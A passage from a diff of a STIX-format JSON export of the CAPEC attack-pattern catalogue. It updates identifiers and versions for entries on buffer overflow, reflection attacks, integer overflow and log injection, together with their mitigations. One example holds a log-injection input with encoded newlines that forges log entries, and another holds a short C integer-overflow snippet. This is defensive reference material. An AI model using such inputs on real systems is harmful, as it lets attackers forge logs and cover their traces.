a command-line option.\n \n \n Attack Example: Solaris getopt\n A buffer overflow in Solaris's getopt command (found in libc) allows local users to gain root privileges via a long argv[0].\n \n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a13e9e68-0c7c-4e41-951d-44a6e2ae79c4" + "id": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-9-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow.", "type": "course-of-action", - "id": "course-of-action--af987c11-7076-4fc5-a556-941a6f5a39c2" + "id": "course-of-action--ebc1b6cd-e87f-4baa-90e5-dd9eb0318070" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--25cbc845-dc3f-4f35-bf86-3b3e448d4599", - "source_ref": "course-of-action--af987c11-7076-4fc5-a556-941a6f5a39c2", + "id": "relationship--a9aeaf08-5aba-42dd-91d1-bcc39d45f830", + "source_ref": "course-of-action--ebc1b6cd-e87f-4baa-90e5-dd9eb0318070", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a13e9e68-0c7c-4e41-951d-44a6e2ae79c4" + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8aaabecd-3a42-4bf2-be85-60b4870ebb87", - "source_ref": "course-of-action--f80bedd2-ad06-4cf0-a5e5-f4fb70c030dd", + "id": "relationship--0447a117-2569-47f3-8dcd-65036bcf0970", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a13e9e68-0c7c-4e41-951d-44a6e2ae79c4" + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--48fd99cb-2775-45ab-9546-8330044abdbd", - "source_ref": "course-of-action--c7d11ced-943e-4974-acf9-b8932232feac", + "id": "relationship--837581cd-38d6-4ae8-881a-6e24f3d91501", + "source_ref": "course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a13e9e68-0c7c-4e41-951d-44a6e2ae79c4" + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a3af1c53-8d83-4c65-ab26-8a7973ca7d9e", - "source_ref": "course-of-action--7dee5d10-4d7e-4583-873d-8ec182af868a", + "id": "relationship--ac38c85d-0695-4c49-8b5b-d3c521ec56dd", + "source_ref": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a13e9e68-0c7c-4e41-951d-44a6e2ae79c4" + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--cb7777d8-764e-4790-b7c0-5950b74e2a7c", - "source_ref": "course-of-action--1543df5d-5c88-43ad-a8ef-67cfefcdb4ed", + "id": "relationship--4c3b04af-8b60-4007-abda-506aac43bb8a", + "source_ref": "course-of-action--d2e2f760-3e91-480d-a010-51c7214317af", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a13e9e68-0c7c-4e41-951d-44a6e2ae79c4" + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-9-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.", "type": "course-of-action", - "id": "course-of-action--493da5ea-cd3f-4b62-a788-3b55bc5b58ef" + "id": "course-of-action--0b3b5c92-65ea-4083-aaaf-95a22c6597cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a82efdd5-76cd-46d2-ac25-0451bf10dc12", - "source_ref": "course-of-action--493da5ea-cd3f-4b62-a788-3b55bc5b58ef", + "id": "relationship--035510a6-4df7-43c5-a925-5c7a32099a19", + "source_ref": "course-of-action--0b3b5c92-65ea-4083-aaaf-95a22c6597cb", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a13e9e68-0c7c-4e41-951d-44a6e2ae79c4" + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-9-6", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Do not unnecessarily expose services.", "type": "course-of-action", - "id": "course-of-action--9c6e1997-437c-4c3b-b1df-e5d9dda7ebad" + "id": "course-of-action--61cfd195-6c06-485f-851b-d522704db751" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c3ad1591-cbb6-4f1a-8028-89fd84626346", - "source_ref": "course-of-action--9c6e1997-437c-4c3b-b1df-e5d9dda7ebad", + "id": "relationship--5030b26b-2e31-4ca9-b274-43bfc198a700", + "source_ref": "course-of-action--61cfd195-6c06-485f-851b-d522704db751", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a13e9e68-0c7c-4e41-951d-44a6e2ae79c4" + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19" }, { "name": "Reflection Attack in Authentication Protocol", "description": "An attacker can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the attacker illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An attacker can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -45195,95 +45920,96 @@ "Bypass Protection Mechanism" ] }, - "x_capec_abstraction": "Detailed", + "x_capec_abstraction": "Standard", "x_capec_example_instances": [ "\n A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.\n An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--92604ce5-a4e5-44f7-9161-8d499bf719ab" + "id": "attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-90-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "The server must initiate the handshake by issuing the challenge. This ensures that the client has to respond before the exchange can move any further", "type": "course-of-action", - "id": "course-of-action--969227c6-4460-4552-94d1-60a3b986f57e" + "id": "course-of-action--0487a38e-a332-463c-9f0e-9eeb1b42348a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c930b94c-6dab-42fe-bdf0-9d89f65cf5f0", - "source_ref": "course-of-action--969227c6-4460-4552-94d1-60a3b986f57e", + "id": "relationship--db1f1278-148e-4811-b44c-d2691ae606e0", + "source_ref": "course-of-action--0487a38e-a332-463c-9f0e-9eeb1b42348a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--92604ce5-a4e5-44f7-9161-8d499bf719ab" + "target_ref": "attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-90-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.", "type": "course-of-action", - "id": "course-of-action--3f877eb3-cbfd-4807-8c9e-eafd7dde88c6" + "id": "course-of-action--dd4d3483-f79a-4e5b-b198-743b20bf8b57" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--975ba983-5e62-48e3-a91e-b8a8cba896e8", - "source_ref": "course-of-action--3f877eb3-cbfd-4807-8c9e-eafd7dde88c6", + "id": "relationship--e12c9fb3-9901-43eb-8175-dac851b91921", + "source_ref": "course-of-action--dd4d3483-f79a-4e5b-b198-743b20bf8b57", "relationship_type": "mitigates", - "target_ref": "attack-pattern--92604ce5-a4e5-44f7-9161-8d499bf719ab" + "target_ref": "attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-90-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol", "type": "course-of-action", - "id": "course-of-action--0391aeaa-536e-4ee6-b48f-ae201d12ee0a" + "id": "course-of-action--ec22dfe1-7907-4279-a8ad-5fae3bf783ca" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9ce5557a-9570-4645-aac5-d821257fcbad", - "source_ref": "course-of-action--0391aeaa-536e-4ee6-b48f-ae201d12ee0a", + "id": "relationship--4240910f-d963-4711-8840-ced5c6574b16", + "source_ref": "course-of-action--ec22dfe1-7907-4279-a8ad-5fae3bf783ca", "relationship_type": "mitigates", - "target_ref": "attack-pattern--92604ce5-a4e5-44f7-9161-8d499bf719ab" + "target_ref": "attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c" }, { "name": "DEPRECATED: XSS in IMG Tags", "description": "This attack pattern has been deprecated as it is contained in the existing attack pattern \"CAPEC-18 : XSS Targeting Non-Script Elements\". Please refer to this other CAPEC going forward.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -45296,15 +46022,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ea99b2db-741b-4bcd-bb75-067b22f2188c" + "id": "attack-pattern--79392581-7f07-4d86-91a3-34c43f209265" }, { "name": "Forced Integer Overflow", "description": "This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -45410,116 +46137,117 @@ "\n The following code illustrates an integer overflow. The declaration of total integer as \"unsigned short int\" assumes that the length of the first and second arguments fits in such an integer.\n include include include \n int main (int argc, char *const *argv){if (argc !=3){printf(\"Usage: prog_name \\n\");exit(-1);\n }unsigned short int total;total = strlen(argv[1])+strlen(argv[2])+1;char * buff = (char *)malloc(total);strcpy(buff, argv[1]);strcpy(buff, argv[2]);\n }\n [R.92.4], [R.92.5]\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--0bc5f8a4-7a8b-4b79-9cf7-cb4ba5d8843a" + "id": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--832708fb-173b-4bde-9c08-67486eb47742", - "source_ref": "course-of-action--f80bedd2-ad06-4cf0-a5e5-f4fb70c030dd", + "id": "relationship--348aebbc-09b9-4051-a6ed-425b45fe65e6", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0bc5f8a4-7a8b-4b79-9cf7-cb4ba5d8843a" + "target_ref": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-92-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.", "type": "course-of-action", - "id": "course-of-action--cc5d51c2-9541-4917-bb56-5f17ada40fe2" + "id": "course-of-action--29a68aab-1993-4ce8-8742-cd88c7104498" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a5871a93-a481-4cba-8467-5632fd7d0343", - "source_ref": "course-of-action--cc5d51c2-9541-4917-bb56-5f17ada40fe2", + "id": "relationship--87288ea2-a91a-4195-acc3-ac477bd9fb9e", + "source_ref": "course-of-action--29a68aab-1993-4ce8-8742-cd88c7104498", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0bc5f8a4-7a8b-4b79-9cf7-cb4ba5d8843a" + "target_ref": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--461f8455-9726-475c-97ac-d13618add78f", - "source_ref": "course-of-action--c7d11ced-943e-4974-acf9-b8932232feac", + "id": "relationship--789b1bc9-99a8-4b08-a8bc-f1de0cf0ac74", + "source_ref": "course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0bc5f8a4-7a8b-4b79-9cf7-cb4ba5d8843a" + "target_ref": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-92-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Always do bound checking before consuming user input data.", "type": "course-of-action", - "id": "course-of-action--c6371377-e7a5-4784-a672-1bf1cfb25071" + "id": "course-of-action--dbf98824-2003-44af-87f6-70a7b758c158" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8f3760e1-7121-4073-9c9a-82793450e1e2", - "source_ref": "course-of-action--c6371377-e7a5-4784-a672-1bf1cfb25071", + "id": "relationship--c095e46c-44ee-4328-9514-b82653c95e7d", + "source_ref": "course-of-action--dbf98824-2003-44af-87f6-70a7b758c158", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0bc5f8a4-7a8b-4b79-9cf7-cb4ba5d8843a" + "target_ref": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-92-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "", "type": "course-of-action", - "id": "course-of-action--7fcc316d-84c4-4bc0-84fe-cf5d0f522697" + "id": "course-of-action--f8cad512-fad0-4c0f-aba9-490764a895d2" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--07906d61-fc43-4848-92a0-7254b5d26f5b", - "source_ref": "course-of-action--7fcc316d-84c4-4bc0-84fe-cf5d0f522697", + "id": "relationship--b32b8dd1-e256-46d1-843f-7a038a0c9afb", + "source_ref": "course-of-action--f8cad512-fad0-4c0f-aba9-490764a895d2", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0bc5f8a4-7a8b-4b79-9cf7-cb4ba5d8843a" + "target_ref": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc" }, { "name": "Log Injection-Tampering-Forging", "description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -45594,131 +46322,132 @@ "\n If a user submits the string \"twenty-one\" for val, the following entry is logged:\n INFO: Failed to parse val=twenty-one\n However, if an attacker submits the string\n twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\n the following entry is logged:\n INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy\n Clearly, attackers can use this same mechanism to insert arbitrary log entries.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--7f9218de-7dcc-49fa-ae32-0f2fd51834e8" + "id": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-93-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Carefully control access to physical log files.", "type": "course-of-action", - "id": "course-of-action--6f92b404-acbe-4d05-aa3e-1e98506d816e" + "id": "course-of-action--dc1128bf-f2b2-46b5-90f6-fffd43578221" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--695122e1-227e-4fd5-995f-4d743b7f8c7c", - "source_ref": "course-of-action--6f92b404-acbe-4d05-aa3e-1e98506d816e", + "id": "relationship--a9b907b4-52c2-42f8-a7ba-52b608c41cdc", + "source_ref": "course-of-action--dc1128bf-f2b2-46b5-90f6-fffd43578221", "relationship_type": "mitigates", - "target_ref": "attack-pattern--7f9218de-7dcc-49fa-ae32-0f2fd51834e8" + "target_ref": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-93-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Do not allow tainted data to be written in the log file without prior input validation. Whitelisting may be used to properly validate the data.", "type": "course-of-action", - "id": "course-of-action--575e416b-ae23-4430-8519-f41b52caa80a" + "id": "course-of-action--a15169a5-13e5-4222-aef0-2452e9fe0921" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7f185c13-9d81-4caf-a9be-2ebdf6fb1e6a", - "source_ref": "course-of-action--575e416b-ae23-4430-8519-f41b52caa80a", + "id": "relationship--237f63b0-e1b6-488d-b059-ec759cf6d24b", + "source_ref": "course-of-action--a15169a5-13e5-4222-aef0-2452e9fe0921", "relationship_type": "mitigates", - "target_ref": "attack-pattern--7f9218de-7dcc-49fa-ae32-0f2fd51834e8" + "target_ref": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dcc152c2-a331-4fc4-9729-b73ef0fdc3f2", - "source_ref": "course-of-action--9579bfe2-a173-41dc-92a5-9b6d594e8c49", + "id": "relationship--1bb6b392-107e-411c-9afb-54d84e17531c", + "source_ref": 